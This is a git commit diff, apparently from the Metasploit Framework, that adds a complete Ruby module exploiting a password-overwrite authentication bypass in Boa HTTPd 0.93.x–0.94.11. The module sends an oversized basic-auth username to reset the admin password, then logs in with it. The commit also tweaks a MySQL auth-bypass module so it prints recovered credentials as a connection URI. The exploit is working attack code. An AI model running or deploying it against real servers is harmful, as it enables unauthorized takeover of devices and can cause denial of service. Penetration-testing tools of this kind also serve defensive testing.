Merge branch 'master' into feature/vuln-info
This commit is contained in:
commit
dd476f8c5d
|
@ -0,0 +1,114 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
|
||||||
|
'Description' => %q{
|
||||||
|
The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
|
||||||
|
allows basic authentication bypass when the user string is greater
|
||||||
|
than 127 bytes long. The long string causes the password to be
|
||||||
|
overwritten in memory, which enables the attacker to reset the
|
||||||
|
password. In addition, the malicious attempt also may cause a
|
||||||
|
denial-of-service condition.
|
||||||
|
|
||||||
|
Please note that you must set the request URI to the directory that
|
||||||
|
requires basic authentication in order to work properly.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
|
||||||
|
'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
|
||||||
|
'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Sep 10 2007'))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [ true, "The request URI", '/']),
|
||||||
|
OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
begin
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri'=>'/',
|
||||||
|
'method'=>'GET'
|
||||||
|
})
|
||||||
|
|
||||||
|
if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
|
||||||
|
print_status("#{@peer} - Boa Version Detected: #{m[1]}")
|
||||||
|
return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
|
||||||
|
return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
else
|
||||||
|
print_status("#{@peer} - Not a Boa Server!")
|
||||||
|
return Exploit::CheckCode::Safe # not a boa server
|
||||||
|
end
|
||||||
|
|
||||||
|
rescue Rex::ConnectionRefused
|
||||||
|
print_error("#{@peer} - Connection refused by server.")
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
@peer = "#{rhost}:#{rport}"
|
||||||
|
return if check != Exploit::CheckCode::Vulnerable
|
||||||
|
|
||||||
|
uri = target_uri.path
|
||||||
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri'=> uri,
|
||||||
|
'method'=>'GET',
|
||||||
|
'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}"
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
print_error("#{@peer} - The server may be down")
|
||||||
|
return
|
||||||
|
elsif res and res.code != 401
|
||||||
|
print_status("#{@peer} - #{uri} does not have basic authentication enabled")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => uri,
|
||||||
|
'method'=> 'GET',
|
||||||
|
'basic_auth' => "admin:#{datastore['PASSWORD']}"
|
||||||
|
})
|
||||||
|
|
||||||
|
if not res
|
||||||
|
print_error("#{@peer} - Server timedout, will not continue")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
case res.code
|
||||||
|
when 200
|
||||||
|
print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
|
||||||
|
when 401
|
||||||
|
print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
|
||||||
|
else
|
||||||
|
print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:socket => s,
|
:socket => s,
|
||||||
:db => nil
|
:db => nil
|
||||||
})
|
})
|
||||||
print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts"
|
print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"
|
||||||
results << x
|
results << x
|
||||||
rescue RbMysql::AccessDeniedError
|
rescue RbMysql::AccessDeniedError
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
|
|
Loading…
Reference in New Issue